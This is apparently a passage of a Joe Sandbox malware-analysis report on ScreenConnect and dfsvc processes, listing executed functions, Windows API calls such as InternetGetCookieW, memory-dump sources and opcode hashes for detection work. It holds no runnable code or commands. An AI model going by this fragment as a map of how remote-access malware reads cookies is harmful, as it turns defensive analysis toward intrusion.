InternetGetCookieW.WININET ref: 00007FFD9B8AEEC6

Memory Dump Source

Source File: 00000001.00000002.2642164148.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8a0000_dfsvc.jbxd

Similarity

API ID: CookieInternet
String ID:
API String ID: 930238652-0
Opcode ID: 57da45ce04d9aac7ce58cc64e2f27867836c9f5042346ea0172a1e58f8a4da37
Instruction ID: 8e64d95b091f8ec7ad4a4fa61c639f61e1f40738912b89a7e24efd99c3408277
Opcode Fuzzy Hash: 57da45ce04d9aac7ce58cc64e2f27867836c9f5042346ea0172a1e58f8a4da37
Instruction Fuzzy Hash: 92911130608B8D4FDB69DF68C8657E53BE1FF59311F04426FD84DC76A2CA74A9058B81

Function 00007FFD9B8A994B Relevance: 1.7, APIs: 1, Instructions: 177
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFD9B8A9A7C

Memory Dump Source

Source File: 00000001.00000002.2642164148.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8a0000_dfsvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 49b43e95b58114766ab6d13bd56b2fa4d419cefe785d5dfa23e54be9179ae96b
Instruction ID: 9abb6a625b82d0f897a2aa9f14c16793a1183d310236aca1eceaf6e6c942462f
Opcode Fuzzy Hash: 49b43e95b58114766ab6d13bd56b2fa4d419cefe785d5dfa23e54be9179ae96b
Instruction Fuzzy Hash: 25519F31A0CA5C8FDB68DF589855BE9BBE0FB59310F1442AEE04DD3252CB34A9558B81

Function 00007FFD9B78EEC0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2641752772.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b78d000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1bec9b56c33262ba82616a1b99b82364fd07fbf30498e79b09cfb3a7aa8df94
Instruction ID: d6e23199647729c049950e5746aca97d3b80db4f4f073f1281391c935083c37a
Opcode Fuzzy Hash: d1bec9b56c33262ba82616a1b99b82364fd07fbf30498e79b09cfb3a7aa8df94
Instruction Fuzzy Hash: 0441263190EFC84FE3969B2898959523FF0EF46325B0502DFD088CB1A3D729A846C792

Analysis Process: ScreenConnect.WindowsClient.exePID: 7416, Parent PID: 6176COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8A43B8 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 776
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L, xrefs: 00007FFD9B8A483C

Memory Dump Source

Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: f81d2a547930ac411271227b63162839abdd64cb10173397ebe280abcc834b3e
Instruction ID: 142dcc7adf867a4dc429b10a43148894d70d160dfc907186bb7d48500b5ea3ea
Opcode Fuzzy Hash: f81d2a547930ac411271227b63162839abdd64cb10173397ebe280abcc834b3e
Instruction Fuzzy Hash: 1832D963A0FBC90FEB25479C68251747F91EF9675071D42FFE088471FBA81AAE068391

Function 00007FFD9B8AF67B Relevance: 1.7, APIs: 1, Instructions: 178
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9B8AF7AC

Memory Dump Source

Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2a7644612495f3298d75aeaf83b840f23f4cbb963ae7794a55020e9157943901
Instruction ID: b80d28b8233033ee2eed48a1c474ee4f49babcf89795d3fee3dca10bf37365f5
Opcode Fuzzy Hash: 2a7644612495f3298d75aeaf83b840f23f4cbb963ae7794a55020e9157943901
Instruction Fuzzy Hash: CB51A171A0CA5C8FDB68DF58D845BE8BBE0FB59310F1442AEE04DD3252CB34A945CB81

Function 00007FFD9B8A3EAA Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8A8542

Memory Dump Source

Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 73c2d40f2bc0fb58d49ac08a5a669f696aecfa8ce0e2d399c86b24d15f66b6fb
Instruction ID: ccd3274ae753aa3898b105231c179a33868ae0b1063be7e60eb99cce0d71fbe8
Opcode Fuzzy Hash: 73c2d40f2bc0fb58d49ac08a5a669f696aecfa8ce0e2d399c86b24d15f66b6fb
Instruction Fuzzy Hash: E921E67191CB188FDB28AF9CDC4AAF97BE0EB59711F00413EE04AD3251DB74B8468B91

Function 00007FFD9B8A84B8 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8A8542

Memory Dump Source

Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 17bdcef4d71634405ec4fcc2c7358be489973f3357f317704507961a28564e9c
Instruction ID: 3cf73bacd08582362f462df11427339d1c0d1fbfec353067d7f4b7f4d1c1501e
Opcode Fuzzy Hash: 17bdcef4d71634405ec4fcc2c7358be489973f3357f317704507961a28564e9c
Instruction Fuzzy Hash: 2531F73091CB188FDB28DF9C9C4A9F97BE0EB59711F00412FE449D3251DB74A845CB92

Function 00007FFD9B8A3DFA Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00007FFD9B8BF4DC

Memory Dump Source

Source File: 00000009.00000002.1968175510.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a8b2e2f28c154821a2929b0fa69c1c0d144b4aad182a898519a9b0c0c04fe054
Instruction ID: 7136d6663835d722ef1d5286734050a3132c16a22e9695a6422c2c372624d677
Opcode Fuzzy Hash: a8b2e2f28c154821a2929b0fa69c1c0d144b4aad182a898519a9b0c0c04fe054
Instruction Fuzzy Hash: 4121D331A08A1C9FDB5CDF98D449BF9BBE0EB69321F10422ED04DD3651DB74A856CB90

Analysis Process: ScreenConnect.ClientService.exePID: 7452, Parent PID: 7416COMMON

Executed Functions

Function 01831828 Relevance: 2.5, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

$kq, xrefs: 01831899
$kq, xrefs: 0183188D

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: 8d2d9a05f6fb365f91b296d325a7696c2406daeed26401ca352bb5fa756e5d93
Instruction ID: dc7b2f9c979c36ace3c3d03f94b218fb6469fa4127b1bf0f8c724cd1ad7dc5d8
Opcode Fuzzy Hash: 8d2d9a05f6fb365f91b296d325a7696c2406daeed26401ca352bb5fa756e5d93
Instruction Fuzzy Hash: FA01A730B053448FC31A9B74D81C6153FB5EF8A711B1A44DAE905CB2A2DB35DC01CB55

Function 0183522A Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

(oq, xrefs: 0183525A

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-3175707579
Opcode ID: 56f6cb88fb14d397495ea6df2ff8c50491a3b3fc82031d496d3fdce65e980567
Instruction ID: 929e54ae8bcf16ddc93d2f1d82f43aea953d275dc18ed52f77dda8ad6bc46f1d
Opcode Fuzzy Hash: 56f6cb88fb14d397495ea6df2ff8c50491a3b3fc82031d496d3fdce65e980567
Instruction Fuzzy Hash: 4D711435B106058FCB14DFA8D894A6EBBB2FF89305B1580A9E506EB365DB30ED01DF80

Function 01836F40 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

LRkq, xrefs: 018370CB

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: ae4bb8dab3e7e12c7222680276d8c34bb0a72bd7a10808a24180219deb23a86e
Instruction ID: 802877df68303e23fc8d7cf636d92e80706631b58bfa4248780d86e5543cbf1c
Opcode Fuzzy Hash: ae4bb8dab3e7e12c7222680276d8c34bb0a72bd7a10808a24180219deb23a86e
Instruction Fuzzy Hash: 8351F170B002159FDB259B68D964B6EBBF2EFC4310F18856AE406DB2A5EB31DD44CBC1

Function 018342F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(oq, xrefs: 01834311

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-3175707579
Opcode ID: 8a9bdfc3e3c6add0d0f1084836b5a2450f7f7a377cfa9bdd3b78ac78ad3a0cf9
Instruction ID: abcfe96cbda699a9dbf4eaf3747e8c17aaf957c25227761f496606fb6efad7ba
Opcode Fuzzy Hash: 8a9bdfc3e3c6add0d0f1084836b5a2450f7f7a377cfa9bdd3b78ac78ad3a0cf9
Instruction Fuzzy Hash: 50418E31A00105CBCB15EF68E598A6EBFB6EFC4310F18C569D905DB359DB34E906CB90

Function 01833480 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

[', xrefs: 01833548

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ['
API String ID: 0-410297704
Opcode ID: a40b76a9599f29c66f21886f5a633b2e55cfd0aeb9b705af9c0b6ab7645d3e0d
Instruction ID: a9bab79a2a1a75e84eb8b77f354139a7cadcc4c6d6eaed3bb190c1513cf8733f
Opcode Fuzzy Hash: a40b76a9599f29c66f21886f5a633b2e55cfd0aeb9b705af9c0b6ab7645d3e0d
Instruction Fuzzy Hash: 9831E1317027015FCB01AB7CA89556EBBEAFBC92507448928E91ADB344EF74ED088BD0

Function 01837691 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a59ca726c9f44dbff2300fd2ebbaf59affa5fd365721cb30f6ef68174a00443
Instruction ID: aa47d27ce385d3fb8479a5e1e9a8b927a60d0b2382cc6eb452843c7a3ab56bc6
Opcode Fuzzy Hash: 6a59ca726c9f44dbff2300fd2ebbaf59affa5fd365721cb30f6ef68174a00443
Instruction Fuzzy Hash: C551D071E103198FDB01DFB8D955BDDBBB5EF89300F14815AE404AB3A4EB749989CB90

Function 01837770 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f837e35c740418ca086de489b57902ca2ad505106c83d4ae4f44736a235302e
Instruction ID: 4bef2ab85bed3936fedfbc72ae68cbecda4ab370eee63e72be68123c8fa8d48b
Opcode Fuzzy Hash: 4f837e35c740418ca086de489b57902ca2ad505106c83d4ae4f44736a235302e
Instruction Fuzzy Hash: CC51CD30E003098FDB01DFB8D844B9DBBB5FF88310F109159E404AB2A5DB75A989CB90

Function 01834940 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3d5638ce6501b1ac4986ff1ee674d3c0b11649cda1c00a2ba631e802c19ab83
Instruction ID: 76373b7794c5957b7ad9c85d91ad18c4a7834e6075ff61763b777bf619d7bbb2
Opcode Fuzzy Hash: d3d5638ce6501b1ac4986ff1ee674d3c0b11649cda1c00a2ba631e802c19ab83
Instruction Fuzzy Hash: 1351F9352006018FC724CF29D884A56B7F2FF89324B288A5CE496DB7A4DB31E946CF84

Function 0183360A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9201d6fec7b2bac7c766efa7c38c994fb53c42b6b03eab085d4a1b84eb77d839
Instruction ID: 934aaecd054afbc9210eb72d22e88ebf9a745adcbd4c54380fa534cb7e65195f
Opcode Fuzzy Hash: 9201d6fec7b2bac7c766efa7c38c994fb53c42b6b03eab085d4a1b84eb77d839
Instruction Fuzzy Hash: BD517E746007058FCB35CF29D844A5ABBF1FF84321B188A69D856C77A5EB30E945CB90

Function 0183366A Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43759659a11320d5d248c0174d5908ed9a59eb3968093a8976322fc0cfaba8b9
Instruction ID: 9f9820ad2da72780e68fa8bf3828f2aa0e5b1b631363541f722439f7793ec6c1
Opcode Fuzzy Hash: 43759659a11320d5d248c0174d5908ed9a59eb3968093a8976322fc0cfaba8b9
Instruction Fuzzy Hash: F24184746007098FCB35DF39D944A5ABBF1FF88321B148A28D456DB7A5DB30E945CB90

Function 01833678 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90229648653c62dd74f1060b66aa765963dae5ba23aca4368c6935e25af87e13
Instruction ID: b67eecf3312be7b3f23ce61373120da964551ef7c92367eeaf3d8b89f5703201
Opcode Fuzzy Hash: 90229648653c62dd74f1060b66aa765963dae5ba23aca4368c6935e25af87e13
Instruction Fuzzy Hash: A4415F746007098FCB35CF39D944A6ABBF1FF88311B148A28D856CB7A5EB30E945CB90

Function 01833DC0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c13e64475bb64c86476781d3491baa8436829d5bb93fb718fd2acfd5f478aff
Instruction ID: 22bba1462ca87c795e435c817be004a6c9799bea15774939b1e54fa2993364ab
Opcode Fuzzy Hash: 9c13e64475bb64c86476781d3491baa8436829d5bb93fb718fd2acfd5f478aff
Instruction Fuzzy Hash: 50315C32B002068FDB149E69C494AAFFBF5EFC9354F14846AE906E7754DB71DD018BA0

Function 0183392C Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a9df36fc163a5268046be8ef5e8b25570529e761798af8b96143806ed535d1
Instruction ID: 68dd4ef5f03738073b52eec82f117b3e31b33b54266c27739492190d5b5297e1
Opcode Fuzzy Hash: 11a9df36fc163a5268046be8ef5e8b25570529e761798af8b96143806ed535d1
Instruction Fuzzy Hash: 5621975B80D3C84BCB179635894F1A46F2469C336475D85CFCAC4CB363D495AB8AE3A1

Function 01833828 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5118b21231ceda5beeed6c5218eda2eccb976ddaf3a87d3e62b0e41be7508ebc
Instruction ID: da4455e2d9b5329bd372d13437344a63b73496bf75a3498961fe632ec36cccf4
Opcode Fuzzy Hash: 5118b21231ceda5beeed6c5218eda2eccb976ddaf3a87d3e62b0e41be7508ebc
Instruction Fuzzy Hash: C731CC71F042498FCB05DA6CC85466EFBB6FFC9310B1481AAD908EB395DA31EE01C791

Function 01835548 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e297e6e68ddda344ef3c3abeae62f59eb5b24763a9a1fc7d364ad4deac7a23bb
Instruction ID: f64bf8b0cde70abfcb052c4c7d8113be17360baa4b1c242bbd71b46f0a51c6ad
Opcode Fuzzy Hash: e297e6e68ddda344ef3c3abeae62f59eb5b24763a9a1fc7d364ad4deac7a23bb
Instruction Fuzzy Hash: F4314A74600B058FC730CF29D884A6AB7F2EF89324B184A2DE456DB7A5E730E905CBD1

Function 01834FD0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2cee64213c178b7dfbfd65129d2768167aba26ac41ad9cc7e5926f6fd45a654
Instruction ID: 7041baa0043f00df96d62af01de500f383d8ed911bedc86c9c8ba88d778f23c6
Opcode Fuzzy Hash: f2cee64213c178b7dfbfd65129d2768167aba26ac41ad9cc7e5926f6fd45a654
Instruction Fuzzy Hash: 30315231A0010ADFCF04DFA8D9449CDBBB6FF89314F158455E505BB265D7356E06CB90

Function 018350C1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 052514445d6e0f84aee5c4e6e8683c253905bd2b08dc4e32b1d53a031f036ad2
Instruction ID: 7d0b3e91878bb8659afd3bc57f4b0665864ca6b28e1ed4e316ba370a6346433f
Opcode Fuzzy Hash: 052514445d6e0f84aee5c4e6e8683c253905bd2b08dc4e32b1d53a031f036ad2
Instruction Fuzzy Hash: 3911D2317012456BCB01EB78E89166EBBA6EFC1210F448525E509EB358DF70AD09CBE1

Function 01836E40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecee98a975aa713317a5552e88dba651f8aeaff73b75393c3cf2e56bd067dd4
Instruction ID: 8c586d76c62f2dd78613bdec53d6445249905b694b8b313866a7360e5a7b40c1
Opcode Fuzzy Hash: fecee98a975aa713317a5552e88dba651f8aeaff73b75393c3cf2e56bd067dd4
Instruction Fuzzy Hash: F9115B72B053446FC7024A68DC11657BFF5EBC5310F2A856BD500CF392EA709E0987D0

Function 01834B70 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c34613180e95260b2e6e9df676f526dee748c13ac6344c3188b190c21bd1b9
Instruction ID: 4197f676fe9354f8d8c5b886f2bbf39bfbbbe2a532335da2d4cfa85e42b143da
Opcode Fuzzy Hash: 55c34613180e95260b2e6e9df676f526dee748c13ac6344c3188b190c21bd1b9
Instruction Fuzzy Hash: 58213E302006058FC734CF6AD848A96BBF1EF84320B048B2DD592976A5DB31EA4ACFD0

Function 018350D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8206854ff3c1bc3af45a86f0a85cb8bd46f7ccc6244f2d4a8389099c183812
Instruction ID: 0595cc4b88ed4cb1ffb6beb6da99662d6ec941da9f64ebabf67f9388bf8ef00e
Opcode Fuzzy Hash: 0b8206854ff3c1bc3af45a86f0a85cb8bd46f7ccc6244f2d4a8389099c183812
Instruction Fuzzy Hash: 2E11E2307012055BCB00EB7CE885A6EFBA7EFC4210F408928E509AB398DF70AD09C7D1

Function 01834F41 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e79db5709ecdf04387c61e62a6a916b7578ae44c720d9b91aaa63fd88892ba7
Instruction ID: 5e8f0066e106f043c54916f5f28a27ad744f24a9c0bd6d3e397cc26107807497
Opcode Fuzzy Hash: 6e79db5709ecdf04387c61e62a6a916b7578ae44c720d9b91aaa63fd88892ba7
Instruction Fuzzy Hash: 12119876A0020A9FCF01DFA8C9409DEBBB5FF49304F148556E505FF265D7316A09CB90

Function 01835649 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b41490a1e641aa71c4e0a1a4c2616ec77e5872712f91ef8f8e83d9c80e84146
Instruction ID: 8f55d4efb321a840abf7c6aefc1624b693111ddbfead62497d43bce7b34c4717
Opcode Fuzzy Hash: 3b41490a1e641aa71c4e0a1a4c2616ec77e5872712f91ef8f8e83d9c80e84146
Instruction Fuzzy Hash: 7911A171E01208ABDB14DE69D800AEABBB6EFC4310F08C565E944D7265E7719A02CBD0

Function 01835658 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869b6ae7204d88c5fa16c67a26eba164e371c9cea112bfd08a7ff95c219c6c11
Instruction ID: dec8482893d392ab55b8b2ebe86eef8bb5662645d50320b283c6a507c3c1ca42
Opcode Fuzzy Hash: 869b6ae7204d88c5fa16c67a26eba164e371c9cea112bfd08a7ff95c219c6c11
Instruction Fuzzy Hash: 1711AD70F01209AFDB14CE6DD810AABBBBAEFC4310F18C46AE504D7264E7719A02CBD0

Function 01835035 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dccbce1a92fef0cc48fe5c22b98d5e1619d3d36087c781f3286d1988165b1fa
Instruction ID: 2ecd40cf5a67940eabf4e1ee869477a8e0f3d6542ad53e9f1a238f8fae8e0b80
Opcode Fuzzy Hash: 3dccbce1a92fef0cc48fe5c22b98d5e1619d3d36087c781f3286d1988165b1fa
Instruction Fuzzy Hash: B9111C3154004DDBCB01DFA8D5948DCFBB2FF85314B59C594E005AB129D772EA86CBE1

Function 01834F50 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ec591edd0ae19814411bffb5fed012455036059c6d1ad4fbad99cb11d63fe2
Instruction ID: d8fe2ca341125dd049a9a118d644ecb988e3025be9303b424ac577334faa9060
Opcode Fuzzy Hash: b6ec591edd0ae19814411bffb5fed012455036059c6d1ad4fbad99cb11d63fe2
Instruction Fuzzy Hash: 23111235A0010A9FCF01DFA8D9409DEBBF5FF49314B508569E909BB265D771AE0ACB90

Function 018312A0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b33232050d271cbfdf0016e1a46c8f564994ccf79fc05c12a9c6edd06a8979
Instruction ID: c867861a9be18f0bef2ad903f3a40a0958319b000cef22d711bd633148dab314
Opcode Fuzzy Hash: c7b33232050d271cbfdf0016e1a46c8f564994ccf79fc05c12a9c6edd06a8979
Instruction Fuzzy Hash: 29018C316003099FC701DB6CD80456DBBA9EBC9750B0886AED919D7206EB35AA058BD0

Function 0179D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962632094.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_179d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85402dbbd25669dba1d575505f51a68c0f45b1e92a1082b171d45b38490968b3
